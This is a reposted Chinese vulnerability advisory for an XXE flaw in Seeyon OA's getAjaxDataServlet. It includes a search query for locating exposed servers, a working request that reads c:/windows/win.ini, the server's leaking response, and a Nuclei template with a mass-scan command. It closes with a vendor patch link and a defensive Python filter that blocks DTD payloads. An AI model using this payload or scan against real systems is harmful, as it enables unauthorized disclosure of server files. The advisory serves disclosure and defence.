Seeyon (致远) OA getAjaxDataServlet XXE vulnerability

admin, 2024-02-26 13:57:30

01 Vulnerability name

Seeyon (致远) OA getAjaxDataServlet XXE vulnerability

02 Affected product

致远互联-OA (Seeyon OA)

03 Vulnerability description

Seeyon's collaborative operations platform is marketed as an enterprise digital-intelligence operations hub that unifies office workflows, finance, management and operations, strengthens connections, and helps enterprises use data for decision-making and full digitalization. The system's getAjaxDataServlet interface has an XXE vulnerability: an attacker can craft malicious content in the submitted XML, which can lead to disclosure of server data and remote control of the server.

04 FOFA query

app="致远互联-OA"

05 Reproduction

Send the following request to the test target; it reads the contents of c:/windows/win.ini.

POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 581
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%5D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

The response is as follows:

HTTP/1.1 200
Connection: close
Content-Length: 1007
Content-Type: text/html;charset=utf-8
Date: Mon, 08 Jan 2024 04:25:57 GMT
Server: SY8045
Set-Cookie: JSESSIONID=0DA12779FEE71DF69052322AD81A3096; Path=/seeyon; HttpOnly

<!DOCTYPE html><html><head><title>异常处理页面</title>
<link rel="stylesheet" href="/seeyon/common/all-min.css?V=V8_0_200613_25650"><script type="text/javascript">if(parent && parent.errorHandle)    parent.errorHandle("");</script></head><body class="page_color">
    提示信息:<BR/>系统级错误,请检查localhost.log查看详细异常堆栈:<br/>com.kg.commons.KgException [err=[KgCommonsError ]] invoke param:[KgSignatureInfo [textinfo=KgTextInfo [signText=null, fontName=宋体, fontColor=18, fontSize=12, fontStyle=0, posType=CENTER_MIDDLE, breakWord=true], waterImg=null, elemId=null, left=0, top=0], [KgProtectedData [fieldName=id, fieldDesc=caption, fieldValue=; for 16-bit app support[fonts][extensions][mci extensions][files][Mail]MAPI=1, encodeValue=OyBmb3IgMTYtYml0IGFwcCBzdXBwb3J0Cltmb250c10KW2V4dGVuc2lvbnNdClttY2kgZXh0ZW5zaW9uc10KW2ZpbGVzXQpbTWFpbF0KTUFQST0xCg==]]]
</body></html>

The response contains the contents of the file (the win.ini text is echoed back in the error page's fieldValue), so the vulnerability is confirmed.

06 Nuclei POC

The POC file contents are as follows:

id: seeyon-getAjaxDataServlet-xxe

info:
  name: 致远OA getAjaxDataServlet XXE漏洞
  author: fgz
  severity: critical
  description: 致远互联协同运营平台,打造企业数智运营中枢,助力企业实现办公业务、财务、管理与运营的一体化运作,帮助企业加强链接、用好数据做好决策,全面实现数字化。该系统getAjaxDataServlet接口存在XXE漏洞,攻击者可以在xml中构造恶意命令,会导致服务器数据泄露以及被远控。
  metadata:
    max-request: 1
    fofa-query: app="致远互联-OA"
    verified: true

requests:
  - raw:
      - |+
        POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
        Content-Type: application/x-www-form-urlencoded

        S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%5D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200 && contains(body, 'for 16-bit app')"

Run the POC:

nuclei.exe -t mypoc/致远/seeyon-getAjaxDataServlet-xxe.yaml -l data/致远互联-OA.txt

07 Remediation

Upgrade to the latest version or apply the security patch released by the vendor:

https://service.seeyon.com/patchtools/tp.html#/patchList?type=%E5%AE%89%E5%85%A8%E8%A1%A5%E4%B8%81&id=170
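For defenders who cannot patch immediately, the request shape shown in the reproduction section (a DOCTYPE with a SYSTEM entity inside the xmlValue form parameter) is easy to recognise at a WAF or reverse proxy, and the same check is what the nuclei matcher above detects from the attacker's side. The following Python is an added example written for this page; it is not Seeyon's code or part of the original post. It assumes (an assumption, not something the page states) that the legitimate client never sends a DTD in xmlValue, so any DOCTYPE can be rejected before the XML reaches a parser, and the request-log format it scans is a constructed one.

```python
"""Detect and block DTD-bearing payloads sent to the getAjaxDataServlet
xmlValue parameter.  Added example; not code from the page or from Seeyon.

Assumptions (not taken from the page): the legitimate client never sends a
DOCTYPE in xmlValue, so any DTD is rejected before parsing; the log line
format used by scan_request_log ("<time> <client> <path> <body>") is made up.
"""
import re
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs, urlencode

# Any DOCTYPE is suspicious for this endpoint.  The entity regex also pulls
# out the URI so an analyst can see which resource the request tried to read.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
ENTITY_RE = re.compile(
    r"<!ENTITY\s+(%\s*)?(\S+)\s+(SYSTEM|PUBLIC)\s+\"([^\"]*)\"(?:\s+\"([^\"]*)\")?",
    re.IGNORECASE,
)

# Sample inputs: the XML carried by the page's request, and a constructed
# benign document of the same shape.
XXE_XML = (
    '<?xml version="1.0"?>\r\n'
    '<!DOCTYPE foo [\r\n'
    '  <!ELEMENT foo ANY >\r\n'
    '  <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" >\r\n'
    ']>\r\n'
    '<Signature><Field><a Index="ProtectItem">true</a>'
    '<b Index="Caption">caption</b><c Index="ID">id</c>'
    '<d Index="VALUE">&xxe;</d></Field></Signature>'
)
BENIGN_XML = (
    '<Signature><Field><a Index="ProtectItem">true</a>'
    '<b Index="Caption">caption</b><c Index="ID">id</c>'
    '<d Index="VALUE">hello</d></Field></Signature>'
)


def form_body(xml_text):
    """Build an application/x-www-form-urlencoded body like the page's request."""
    return urlencode({"S": "ajaxColManager", "M": "colDelLock",
                      "signwidth": "4.0", "signheight": "4.0",
                      "xmlValue": xml_text})


def extract_xml_value(body):
    """Return the decoded xmlValue parameter, or '' when it is absent."""
    return parse_qs(body, keep_blank_values=True).get("xmlValue", [""])[0]


def inspect_xml(xml_text):
    """List DTD-related findings ('doctype', 'external-entity:name:uri',
    'parameter-entity:name:uri') in the order they appear."""
    findings = []
    if DOCTYPE_RE.search(xml_text):
        findings.append("doctype")
    for m in ENTITY_RE.finditer(xml_text):
        is_param, name, kind, first, second = m.groups()
        # PUBLIC entities carry a public id first and the URI second.
        uri = second if kind.upper() == "PUBLIC" and second else first
        label = "parameter-entity" if is_param else "external-entity"
        findings.append(f"{label}:{name}:{uri}")
    return findings


def classify_request(body):
    """Guard to run before the XML reaches a parser.
    Returns ('block', findings) or ('allow', {Index: text} field values)."""
    xml_text = extract_xml_value(body)
    findings = inspect_xml(xml_text)
    if findings:
        return "block", findings
    if not xml_text:
        return "allow", {}
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return "block", ["malformed-xml"]
    values = {el.get("Index"): (el.text or "")
              for el in root.iter() if el.get("Index")}
    return "allow", values


# Constructed request-log lines; the timestamp mirrors the page's response date.
SAMPLE_LOG = [
    "2024-01-08T04:25:57Z 10.0.0.5 /seeyon/m-signature/RunSignature/run/getAjaxDataServlet "
    + form_body(XXE_XML),
    "2024-01-08T04:26:10Z 10.0.0.7 /seeyon/m-signature/RunSignature/run/getAjaxDataServlet "
    + form_body(BENIGN_XML),
]


def scan_request_log(lines):
    """Return (client, findings) for every getAjaxDataServlet request carrying a DTD."""
    hits = []
    for line in lines:
        parts = line.split(" ", 3)
        if len(parts) < 4 or not parts[2].endswith("/getAjaxDataServlet"):
            continue
        findings = inspect_xml(extract_xml_value(parts[3]))
        if findings:
            hits.append((parts[1], findings))
    return hits


if __name__ == "__main__":
    print(classify_request(form_body(XXE_XML)))    # ('block', [...])
    print(classify_request(form_body(BENIGN_XML)))  # ('allow', {...})
    print(scan_request_log(SAMPLE_LOG))             # one hit from 10.0.0.5
```

The guard is deliberately stricter than "disable external entities": because the signature XML this endpoint expects has no DTD at all, rejecting every DOCTYPE closes the file-read case on the page as well as parameter-entity variants, and a hit in `scan_request_log` on the vulnerable path is a reliable indicator to pivot from into localhost.log, where the page shows the leaked content ends up.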

Originally published on the WeChat public account AI与网安: 致远OA getAjaxDataServlet XXE漏洞

Reposted by CN-SEC: http://cn-sec.com/archives/2525865.html